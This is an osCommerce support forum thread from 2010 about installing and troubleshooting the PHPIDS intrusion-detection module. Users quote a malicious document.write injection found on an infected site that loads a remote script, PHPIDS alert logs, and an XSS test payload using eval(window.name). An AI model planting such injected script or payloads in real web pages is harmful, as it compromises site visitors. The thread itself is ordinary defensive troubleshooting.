celextel Posted June 17, 2010 Author Posted June 17, 2010 Hello, I just found a virus on my site: includes/general.js line 192 document.write('<s'+'cript type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></scr'+'ipt>'); and so on, more than 20 files infected; the security mod will not prevent this. PHPIDS does not protect you from intrusion or virus. It only warns you when an intrusion takes place. It would also not detect any virus on your system. You need to scan your website for virus with a Virus scanner provided by your host or another osCommerce module for detecting the virus. Please leave your suggestion in regard to this [virus detection] in the PHPIDS forum at the following URL: http://php-ids.org/forum/ Quote
pablito21050 Posted June 17, 2010 Posted June 17, 2010 PHPIDS does not protect you from intrusion or virus. It only warns you when an intrusion takes place. It would also not detect any virus on your system. You need to scan your website for virus with a Virus scanner provided by your host or another osCommerce module for detecting the virus. Please leave your suggestion in regard to this [virus detection] in the PHPIDS forum at the following URL: http://php-ids.org/forum/ Yes, I mean I didn't get any warning message.. I have already open a thread on your forum. Quote
celextel Posted June 17, 2010 Author Posted June 17, 2010 Yes, I mean I didn't get any warning message.. I have already open a thread on your forum. You need to change your passwords to FTP and osCommerce Admin immediately. Someone seems to have got access to your files through FTP or osC Admin [if you have file manager there] and injected those codes. PHPIDS detects only those intrusions which take place through your website catalog URL through the query string. It would also not detect the virus codes which are already existing in the files. Quote
pablito21050 Posted June 17, 2010 Posted June 17, 2010 You need to change your passwords to FTP and osCommerce Admin immediately. Someone seems to have got access to your files through FTP or osC Admin [if you have file manager there] and injected those codes. PHPIDS detects only those intrusions which take place through your website catalog URL through the query string. It would also not detect the virus codes which are already existing in the files. Thanks celextel for understanding; I have already put the site offline and changed the FTP password. We are cleaning all infected files but I need to find a solution, I'll contact you by PM. Quote
pctekcomponents Posted July 13, 2010 Posted July 13, 2010 (edited) Hi, Is it possible for PHPIDS to push server usage over 20%. I only ask as my website got disable for a few minutes because of this. I also got an intrusion email.... The following attack has been detected by PHPIDS Date: 2010-07-12T18:24:49-05:00 Impact: 10 Affected tags: xss csrf Affected parameters: REQUEST.image=%3A%3A%3A%3A%3A%3A%3A%3A%3A%3Aget_product_image.php%3Fid%3DHDREXTFUJIEXT1TBa.jpg%3A%3Aget_product_image.php%3Fid%3DSamsungTS-H353B_250.jpg%3A%3A%3A%3Aget_product_image.php%3Fid%3Dzm-f3120.jpg%3A%3Aget_product_image.php%3Fid%3DGCD-SPH-HD3450.jpg%3A%3Aget_product_image.php%3Fid%3DLiteOnIHAS524-32_250.jpg%3A%3Aget_product_image.php%3Fid%3DHDAV_small.jpg%3A%3Aget_product_image.php%3Fid%3DNET-WLAPCI-TLWN350G-2130.jpg%3A%3Aget_product_image.php%3Fid%3DGCT-S800F.jpg%3A%3Aget_product_image.php%3Fid%3D3d-avatar.jpg%3A%3Aget_product_image.php%3Fid%3Dx4-xl.jpg%3A%3Aget_product_image.php%3Fid%3Dslimbladeblack.jpg%3A%3Aget_product_image.php%3Fid%3DSPK-2P1.jpg%3A%3Aget_product_image.php%3Fid%3Dcyborgx.jpg%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A, POST.image=%3A%3A%3A%3A%3A%3A%3A%3A%3A%3Aget_product_image.php%3Fid%3DHDREXTFUJIEXT1TBa.jpg%3A%3Aget_product_image.php%3Fid%3DSamsungTS-H353B_250.jpg%3A%3A%3A%3Aget_product_image.php%3Fid%3Dzm-f3120.jpg%3A%3Aget_product_image.php%3Fid%3DGCD-SPH-HD3450.jpg%3A%3Aget_product_image.php%3Fid%3DLiteOnIHAS524-32_250.jpg%3A%3Aget_product_image.php%3Fid%3DHDAV_small.jpg%3A%3Aget_product_image.php%3Fid%3DNET-WLAPCI-TLWN350G-2130.jpg%3A%3Aget_product_image.php%3Fid%3DGCT-S800F.jpg%3A%3Aget_product_image.php%3Fid%3D3d-avatar.jpg%3A%3Aget_product_image.php%3Fid%3Dx4-xl.jpg%3A%3Aget_product_image.php%3Fid%3Dslimbladeblack.jpg%3A%3Aget_product_image.php%3Fid%3DSPK-2P1.jpg%3A%3Aget_product_image.php%3Fid%3Dcyborgx.jpg%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A, Request URI: %2Fcatalog%2Fbuilder_main.php%3Faction%3Dadd_products Origin: 174.36.208.130 I was testing out a feature in my store and im not sure if there is an issue with the feature itself. Thanks Edited July 13, 2010 by pctekcomponents Quote
celextel Posted July 13, 2010 Author Posted July 13, 2010 Hi, Is it possible for PHPIDS to push server usage over 20%. I only ask as my website got disable for a few minutes because of this. I also got an intrusion email.... The following attack has been detected by PHPIDS Impact: 10 Affected tags: xss csrf Affected parameters: REQUEST.image POST.image I was testing out a feature in my store and im not sure if there is an issue with the feature itself. Thanks We have been using PHPIDS in 5 of our websites and we have not noticed any push to server usage. This should be due to some other factor. The reported intrusion seems to be of the feature which you were trying to test. You could add these variables [REQUEST.image, POST.image] as Variable Exclusions if required. Quote
pctekcomponents Posted July 20, 2010 Posted July 20, 2010 Thanks Celextel. It turns out that Custom Product Builder doesn;t appreciate " in any product descriptions. Is there any info on interpreting PHPIDS results? Any time i get a detection i have no idea what i'm looking at. For example i got this intrusion notification a little while ago.... IP: 109.224.137.123 Date: 2010-07-20T15:16:53-05:00 Impact: 66 Affected tags: xss csrf id rfe lfi Affected parameters: REQUEST.s_vi_zmxxkhx7Faezy=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, REQUEST.s_vi_x7Blyjilgdijg=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, REQUEST.s_vi_wx60uferl=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, COOKIE.s_vi_zmxxkhx7Faezy=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, COOKIE.s_vi_x7Blyjilgdijg=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, COOKIE.s_vi_wx60uferl=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, Request URI: %2Fcatalog%2Fsumvision-cyclone-1080p-media-player-hdmi-network-media-p-11303.html Origin: 174.36.208.130 I'm really not sure what any of the above means. Quote
celextel Posted July 21, 2010 Author Posted July 21, 2010 Thanks Celextel. It turns out that Custom Product Builder doesn;t appreciate " in any product descriptions. Is there any info on interpreting PHPIDS results? Any time i get a detection i have no idea what i'm looking at. For example i got this intrusion notification a little while ago.... IP: 109.224.137.123 Date: 2010-07-20T15:16:53-05:00 Impact: 66 Affected tags: xss csrf id rfe lfi Affected parameters: REQUEST.s_vi_zmxxkhx7Faezy=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, REQUEST.s_vi_x7Blyjilgdijg=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, REQUEST.s_vi_wx60uferl=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, COOKIE.s_vi_zmxxkhx7Faezy=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, COOKIE.s_vi_x7Blyjilgdijg=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, COOKIE.s_vi_wx60uferl=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, Request URI: %2Fcatalog%2Fsumvision-cyclone-1080p-media-player-hdmi-network-media-p-11303.html Origin: 174.36.208.130 I'm really not sure what any of the above means. Interpreting PHPIDS result is not easy. You could go through PHPIDS forum in regard to this. This seems to be an attack. You could verify the IP and ban it. Quote
ozstar Posted July 26, 2010 Posted July 26, 2010 Hi, I have tried to install phpids version 1.6 however the install file mentions files which are not in 1.6. I went and got 1.4 and 1.5 and the files are not in there either. All packages say the zip is a full package. Can we have an install file that is relavent for 1.6 please as we would like to install it. Thank you oz :-) Quote
celextel Posted July 26, 2010 Author Posted July 26, 2010 Hi, I have tried to install phpids version 1.6 however the install file mentions files which are not in 1.6. I went and got 1.4 and 1.5 and the files are not in there either. All packages say the zip is a full package. Can we have an install file that is relavent for 1.6 please as we would like to install it. Thank you oz :-) You need to install the latest one. It has all the files. Please let us know exactly as to which of the file is not in that package. Quote
ozstar Posted July 28, 2010 Posted July 28, 2010 Thank you for the reply. These are the files in the latest package however the install files mentons other files. Regards, oz :-) In /phpidsPHPIDS_for_oscommerce_1_6/ directory Read_Me.htm banned.php GPL.txt and these dirs.. /admin/ banned_ip.php phpids_installer.php phpids_report.php /admin/includes/ /functions/ version_checker.php /languages/ /english/ banned_ip.php phpids_report.php version_checker.php /cache/ index.php /includes/ /modules/ banned_ip.php osc_phpids.php Quote
celextel Posted July 28, 2010 Author Posted July 28, 2010 Thank you for the reply. These are the files in the latest package however the install files mentons other files. Regards, oz :-) In /phpidsPHPIDS_for_oscommerce_1_6/ directory Read_Me.htm banned.php GPL.txt and these dirs.. /admin/ banned_ip.php phpids_installer.php phpids_report.php /admin/includes/ /functions/ version_checker.php /languages/ /english/ banned_ip.php phpids_report.php version_checker.php /cache/ index.php /includes/ /modules/ banned_ip.php osc_phpids.php You need to Download "PHPIDS 0.6.4 (ZIP)" or the latest version at: http://php-ids.org/downloads/ Please let us know exactly as to which of the files are missing other than this one. Quote
ozstar Posted July 28, 2010 Posted July 28, 2010 HI, Okay I did get the files from the main PHPIDS site above and they are very different from what is at the osc addon contrib site. Anyway, this 0.64 has the dirs .. docs/ libs/ test/ Now before I install these should I delete everything I installed before.. eg the dirs and files I mention above and start anew? Thanks oz :-) Quote
celextel Posted July 29, 2010 Author Posted July 29, 2010 HI, Okay I did get the files from the main PHPIDS site above and they are very different from what is at the osc addon contrib site. Anyway, this 0.64 has the dirs .. docs/ libs/ test/ Now before I install these should I delete everything I installed before.. eg the dirs and files I mention above and start anew? Thanks oz :-) You need to install both [core files from PHPIDS website and module files from the add-on section] as mentioned in our Read Me file. Please go through that file carefully and do the installation as mentioned therein. Quote
hetmana Posted August 1, 2010 Posted August 1, 2010 I hope to get this working soon. I downloaded 1.6, along with PHPIDS 0.6.4 The first phase of the install went perfectly -- got the tables creation confirmation, OSC admin panel has all appropriate Configuration and Tools entries. I left all settings completely default. Then I uploaded the new and changed files for the catalog. After I set "Show Intrusion Result" to true so that I could test the installation, I tried both intrusion examples. Both times I got the following message: Exception: 23000, 1048, Column 'origin' cannot be null When I went to the admin panel to check the log -- no entries. I've gone over the instructions to make sure I did everything correctly 4 times; CHMOD was done right when I uploaded - rechecked; checked my database - new tables are there. Any suggestions would be immensely appreciated. I don't have any idea where to chase this. Quote
celextel Posted August 2, 2010 Author Posted August 2, 2010 I hope to get this working soon. I downloaded 1.6, along with PHPIDS 0.6.4 After I set "Show Intrusion Result" to true so that I could test the installation, I tried both intrusion examples. Both times I got the following message: Exception: 23000, 1048, Column 'origin' cannot be null "phpids_intrusions" db table has got a column by this name "origin" to record the server ip automatically. It is unable to perform this. You need to enable error handling and find out why this is not happening. If you are unable to find out a solution to this, please make the "Null" for this column as "Yes" in this table in your MySQL DB through phpMyAdmin. Quote
hetmana Posted August 3, 2010 Posted August 3, 2010 If you are unable to find out a solution to this, please make the "Null" for this column as "Yes" in this table in your MySQL DB through phpMyAdmin. My error handling is set to ALL. I reset the error log so that I can see specifically what today's problem is. When I attempted the test URL's from the ReadMe, I was of course still getting the error previously mentioned, so I set origin to Null. Now at the top of my page, I get: ------------------------------ Total impact: 8 Affected tags: xss, csrf Variable: REQUEST.test | Value: \">XXX Impact: 4 | Tags: xss, csrf Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1 Variable: GET.test | Value: \">XXX Impact: 4 | Tags: xss, csrf Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1 Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /[snip]/includes/modules/osc_phpids.php:199) in /[snip]/includes/functions/sessions.php on line 102 ------------------------------ followed by the rest of my page just like normal. Still have NOTHING in the error log. Thank you for helping me out with this. I really appreciate it. Quote
celextel Posted August 3, 2010 Author Posted August 3, 2010 Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /[snip]/includes/modules/osc_phpids.php:199) in /[snip]/includes/functions/sessions.php on line 102 We do not know as to why you were getting this error message. You need to enable error logging into your hosting account. If you are unable to do this yourself, you have to request your hosting provider to do this. Quote
♥altoid Posted August 8, 2010 Posted August 8, 2010 "phpids_intrusions" db table has got a column by this name "origin" to record the server ip automatically. It is unable to perform this. You need to enable error handling and find out why this is not happening. If you are unable to find out a solution to this, please make the "Null" for this column as "Yes" in this table in your MySQL DB through phpMyAdmin. By going in through phpMyAdmin and manually changing the origin row to null as follows: origin varchar(15) latin1_swedish_ci Yes NULL I was able to get this to work. However for the second test: ?test="><script>eval(window.name)</script> When I run this I get Forbidden You don't have permission to access page_name.html on this server Quote I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are.
♥altoid Posted August 9, 2010 Posted August 9, 2010 >> Anti XSS [XSS Shield] PHPIDS would not work fully if you use this as some of the query strings get sanitized. You do not require this if you use Security Pro as both of them have almost same functions. I want to make sure I follow the logic on this. With Anti XSS [XSS Shield]installed, that code would stop the intrusion and redirect to a 403 page, but also stop the code short of allowing PHPIDS to function, do I have that correct? With Anti XSS [XSS Shield] removed, PHPIDS will then process an injection, do its job but in at least some cases, the script would still run in application_top.php and allow Security Pro to sanitize the string as well. Is that accurate? Thanks much. Quote I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are.
celextel Posted August 10, 2010 Author Posted August 10, 2010 However for the second test: ?test="><script>eval(window.name)</script> When I run this I get Forbidden You don't have permission to access page_name.html on this server We do not have a file named as page_name.html in our module. You need to find our as to the module which is using this file. Perhaps some other contribution may be interfering with our contribution. Quote
celextel Posted August 10, 2010 Author Posted August 10, 2010 I want to make sure I follow the logic on this. With Anti XSS [XSS Shield]installed, that code would stop the intrusion and redirect to a 403 page, but also stop the code short of allowing PHPIDS to function, do I have that correct? With Anti XSS [XSS Shield] removed, PHPIDS will then process an injection, do its job but in at least some cases, the script would still run in application_top.php and allow Security Pro to sanitize the string as well. Is that accurate? Thanks much. You are correct. PHPIDS creates a log about an intrusion when it occurs. Anti XSS codes do not allow this to happen. You could have Security Pro in lieu of Anti XSS. Quote
♥altoid Posted August 10, 2010 Posted August 10, 2010 We do not have a file named as page_name.html in our module. You need to find our as to the module which is using this file. Perhaps some other contribution may be interfering with our contribution. Since posting my observation I removed XSS [XSS Shield] and reran test 2. That error page I asked about disappeared on the second run; and the module functioned as it was supposed to. Thanks much. Quote I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are.
♥altoid Posted August 10, 2010 Posted August 10, 2010 You are correct. PHPIDS creates a log about an intrusion when it occurs. Anti XSS codes do not allow this to happen. You could have Security Pro in lieu of Anti XSS. Hello, with Anti XSS removed now from my system and Security Pro installed as per instructions in PHPIDS read me, all appears OK. However I have noticed that when I am run Site Monitor, there are 18 files that keep recurring in the report even after I delete the Site Monitor reference file. The recurring files are located in these directories: includes/phpids/lib/IDS/tmp/ includes/phpids/lib/IDS/vendors/ I found I can get them to stop appearing in the Site Monitor report if I exclude them in the configure part of Site Monitor, but I thought I'd mention the situation for discussion sake. I am presuming there is something dynamic about these files that make them constantly change, perhaps that's how they work. Thank for your assistance. Quote I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are.
celextel Posted August 11, 2010 Author Posted August 11, 2010 includes/phpids/lib/IDS/tmp/ includes/phpids/lib/IDS/vendors/ Yes, you have to add these directories in Site Monitor under exclusions. We are also using Site Monitor. Quote
New 
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.